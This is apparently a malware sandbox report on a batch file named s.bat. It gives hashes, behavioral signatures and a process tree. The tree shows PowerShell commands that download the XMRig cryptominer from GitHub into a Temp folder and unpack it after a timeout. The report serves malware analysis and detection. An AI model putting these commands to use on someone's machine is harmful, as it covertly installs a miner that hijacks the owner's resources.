Analysis
-
max time kernel
63s -
max time network
64s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21-12-2024 15:07
Behavioral task
behavioral1
Sample
s.bat
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
s.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
s.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
s.bat
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral5
Sample
s.bat
Resource
win11-20241007-en
General
-
Target
s.bat
-
Size
1KB
-
MD5
1e64009a55d5a9eb64fd903f621e5ae0
-
SHA1
0e5de7ecc2363d16ac2ae8f244d895cff70d6cdb
-
SHA256
c5845905301cb177cd5ba386ab909a43ed5263ddbbc470ab0da8ef8c8bc82abf
-
SHA512
2b28221714861951beeb73247a7ab58f4e68d3510e030d25787a13c6c715cea2b82d51cb1f262736dde8738e9ceb59420b4d4dc724524ece75a6a13978da8695
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 3012 powershell.exe 8 3012 powershell.exe -
pid Process 1864 powershell.exe 3012 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1268 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3012 powershell.exe 3012 powershell.exe 1864 powershell.exe 1864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4264 wrote to memory of 3012 4264 cmd.exe 82 PID 4264 wrote to memory of 3012 4264 cmd.exe 82 PID 4264 wrote to memory of 1268 4264 cmd.exe 88 PID 4264 wrote to memory of 1268 4264 cmd.exe 88 PID 4264 wrote to memory of 1864 4264 cmd.exe 92 PID 4264 wrote to memory of 1864 4264 cmd.exe 92
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\system32\timeout.exetimeout /t 102⤵
- Delays execution with timeout.exe
PID:1268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
1KB
MD578153de63c467e206b9b565dadeccfe6
SHA129ba7d083efb8e7c215d09dddd937ed8292d3f59
SHA2562cf859da0d2b6da20d4f3ce8c1d497ac9152c90b9640f92d033b0a679d2e3f93
SHA512913622de8c0885996a75f640b6e38300a0ca88d34f176c9f61eb5feb5c5be3e03868d3fceeb8c46b253d2977a2d8898cc4b10042940844f1d0af8a65b82f1a94
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD557b7ab5bce7d5e47fd168e1f0d437d32
SHA1050eeae3e0f0e876f9da175347b586871d14fe83
SHA2561d903d39c7e4e1706c32c44721d6a6c851aa8c4c10df1479478ee93cd67301bc
SHA5128cc6e3e0e78f706172a47bef261e1d73ce882ce531fe51177ba46cee659128e2115311d348ca07a717ff737e4bc802c7ca4cc57de716cbe55202b9482b5e2022